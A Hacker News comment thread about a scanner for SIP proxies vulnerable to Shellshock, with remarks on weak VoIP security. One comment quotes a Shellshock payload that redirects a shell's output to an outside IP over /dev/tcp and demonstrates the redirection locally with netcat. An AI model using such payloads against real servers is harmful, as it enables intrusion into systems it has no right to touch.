

A scanner for SIP proxies vulnerable to Shellshock - lzaf
https://github.com/zaf/sipshock

======
MichaelGG
This was my first thought when I heard of the bash issue. Hopefully someone
runs this with a noticeable payload (but not necessarily that malicious) to
help wake people up.

OTOH, every single SIP stack I've tested is vulnerable to IP spoofing (due to
the inane rules of SIP which make this attack very easy), yet IP auth is used
extensively as _the_ authentication system for wholesale VoIP traffic.

In addition, every VoIP system I've looked at as-a-whole has had all sorts of
other vulnerabilities. Easy stuff, too, like "SQL injection on login form
leading to full remote access to system". Vendors and customers pretty much
don't seem to understand or care. One CTO of a successful SIP-based product
said to me "Buffer overflows? That may be possible, but only if the network
was very, very fast." His software handles many, many calls, had accidental
remote backdoors, and is responsible for "securing" many many millions of
dollars of telecom a month.

The telecom mindset seems wholly incapable of dealing with an environment such
as the Internet.

But... end-user devices or "PBXes" have enough holes that attackers appear to
be content to "smash-and-grab" for the most part. It doesn't seem like
attackers are going after the "carriers" yet, although there's certainly
enough money involved that someone stealing, say, 1% of a company's total
volume would go unnoticed.

------
daveloyall
Plus one for this, which I'd never heard of!

    
    
        () { :;};exec >/dev/tcp/1.2.3.4/8080
    

In terminal A:

    
    
        hobbes@metalbaby:~$ nc -l -p 9999 -vv
    

In terminal B:

    
    
        hobbes@metalbaby:~$ exec >/dev/tcp/127.0.0.1/9999
    

Results:

    
    
        hobbes@metalbaby:~$ nc -l -p 9999 -vv
        listening on [any] 9999 ...
        connect to [127.0.0.1] from localhost [127.0.0.1] 43230

------
xSwag
IMO there should be some sort of header like

    
    
        x-whitehat: autopatch
    

which gives white-hats the opportunity to patch your system without
exploiting. The why I see it, a malicious person is going to exploit your
server anyway. This way white-hats could patch your system and not be
prosecuted. With this, someone who discovered the patch could scan the
internet, look for servers that say "yes, please patch me" and deploy a quick
patch and nothing else.

